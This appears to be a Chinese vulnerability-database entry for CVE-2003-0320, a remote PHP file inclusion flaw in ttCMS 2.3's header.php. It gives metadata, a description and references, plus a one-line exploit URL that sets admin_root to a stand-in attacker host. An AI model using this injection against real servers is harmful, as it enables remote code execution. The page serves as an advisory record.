ttCMS header.php 注入任意PHP代码

ttCMS header.php 注入任意PHP代码

漏洞ID 1107331 漏洞类型 未知
发布时间 2003-05-17 更新时间 2003-06-09
图片[1]-ttCMS header.php 注入任意PHP代码-安全小百科CVE编号 CVE-2003-0320
图片[2]-ttCMS header.php 注入任意PHP代码-安全小百科CNNVD-ID CNNVD-200306-016
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/22612
https://www.securityfocus.com/bid/87144
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-016
|漏洞详情
ttCMS2.3及其早期版本中的header.php存在漏洞。远程攻击者可以通过设置ttcms_user_admin参数为“1”和修改admin_root参数指向包含特洛伊木马header.inc.php脚本的URL注入任意PHP代码。
|漏洞EXP
source: http://www.securityfocus.com/bid/7625/info

A remote file include vulnerability has been reported for ttCMS. Due to insufficient sanitization of some user-supplied variables by the 'header.php' script, it is possible for a remote attacker to include a malicious PHP file in a URL. 

http://target/admin/templates/header.php?admin_root=http://attacker/
|受影响的产品
Andy Prevost Ttcms 2.3
|参考资料

来源:BUGTRAQ
名称:20030517RemotecodeexecutioninttCMS<=v2.3
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105320172212990&w;=2

相关推荐: GlimpseHTTP and WebGlimpse Piped Command Vulnerability

GlimpseHTTP and WebGlimpse Piped Command Vulnerability 漏洞ID 1105155 漏洞类型 Input Validation Error 发布时间 1996-07-03 更新时间 1996-07-03 CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享